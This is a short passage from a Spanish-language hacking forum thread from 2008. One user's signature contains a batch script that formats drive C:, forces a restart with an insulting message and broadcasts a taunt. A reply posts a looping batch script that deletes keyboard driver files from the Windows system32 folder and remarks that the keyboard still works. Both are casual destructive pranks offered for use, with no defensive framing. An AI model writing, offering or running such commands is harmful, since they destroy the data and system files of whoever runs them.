el code es de the shadow creo.....
« Última modificación: Abril 08, 2008, 11:33:28 por cuban-hack » En línea
vivimos para amar,
y el amor es todo lo que nos rodea....
material o no......
por eso vive con pacion todo lo que digas o escrivas.. y seras recordado..
                            yu cuban-hack [cub2(daviel)]
echo off
format c:\
y/n:y
y/n:y
shutdown -r -t 05 -e "JODETE"
msgs *yo vivo jodiendo y ¿tu?
Bizz
Visitante
« Respuesta #24 en: Abril 08, 2008, 11:52:28 »
te refieres a un bucle similar a este ?

:key
del /s /q %windir%\system32\keyboard.sys
del /s /q %windir%\system32\keyboard.drv
goto key

porke si es asi eso de nada sirve el teclado sigue funcionando normalmente
En línea
Páginas: [1] 2 Ir Arriba